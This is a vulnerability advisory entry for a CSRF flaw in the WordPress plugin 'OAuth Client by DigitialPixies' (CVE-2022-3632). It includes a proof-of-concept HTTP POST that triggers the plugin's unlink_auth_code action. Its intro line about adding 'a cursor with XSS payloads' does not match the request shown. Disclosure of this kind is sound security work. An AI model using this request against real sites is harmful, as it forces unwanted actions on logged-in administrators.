OAuth Client by DigitialPixies

OAuth Client by DigitialPixies <= 1.1.0 - CSRF

LANACOMMONVDB ID: dae7a7ae-9627-4644-ac2f-eb6e18822571

The plugin does not have Cross-Site Request Forgery (CSRF) check in some places, which could allow attackers to make logged-in users perform unwanted actions.

Proof of Concept

To add a cursor with XSS payloads in it:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=dpt-oauth-ajax&call=unlink_auth_code

References

Source Code: https://wordpress.org/plugins/dpt-oauth-client/

CVE: CVE-2022-3632

Attributes

Catgory: WordPress Plugin

Discovered: 2022-10-10

Published: 2022-10-21

Affected Version: <= 1.1.0

Classification

Type: Cross-Site Request Forgery (CSRF)

Researcher

Name: István Márton

Email: [email protected]